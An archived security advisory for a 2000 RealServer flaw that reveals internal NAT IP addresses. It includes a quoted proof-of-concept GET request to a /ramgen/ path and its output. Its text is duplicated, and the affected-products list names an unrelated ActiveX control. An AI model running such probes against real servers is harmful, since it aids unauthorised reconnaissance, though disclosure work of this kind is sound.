RealServer Internal IP Address Disclosure Vulnerability
BID:1049
Info
RealServer Internal IP Address Disclosure Vulnerability
| Bugtraq ID: | 1049 |
| Class: | Design Error |
| CVE: | |
| Remote: | Yes |
| Local: | Yes |
| Published: | Mar 08 2000 12:00AM |
| Updated: | Mar 08 2000 12:00AM |
| Credit: | Posted to Bugtraq on March 8, 2000 by tschweikle <[email protected]>. |
| Vulnerable: |
RealNetworks Real Server 7.0 RealNetworks Real Server 5.0 RealNetworks GameHouse dldisplay ActiveX control 0 |
| Not Vulnerable: | |
Discussion
RealServer Internal IP Address Disclosure Vulnerability
By default, Real Server includes the IP address of the server in data sent to the client. If the Real Server is installed on a machine in a NAT environment, (where requests from the outside network are handled by reverse proxy), this will reveal what are supposed to be private, hidden IP addresses.
By default, Real Server includes the IP address of the server in data sent to the client. If the Real Server is installed on a machine in a NAT environment, (where requests from the outside network are handled by reverse proxy), this will reveal what are supposed to be private, hidden IP addresses.
Exploit / POC
RealServer Internal IP Address Disclosure Vulnerability
From the bugtraq post by tschweikle <[email protected]>:
$ GET http://realg2.example.com:8080/ramgen/foo.rm
reveals-
rtsp://192.168.11.12:554/foo.rm
--stop--
pnm://192.168.11.12:7070/foo.rm
server info:
WinNT Version 6.0.3.303
From the bugtraq post by tschweikle <[email protected]>:
$ GET http://realg2.example.com:8080/ramgen/foo.rm
reveals-
rtsp://192.168.11.12:554/foo.rm
--stop--
pnm://192.168.11.12:7070/foo.rm
server info:
WinNT Version 6.0.3.303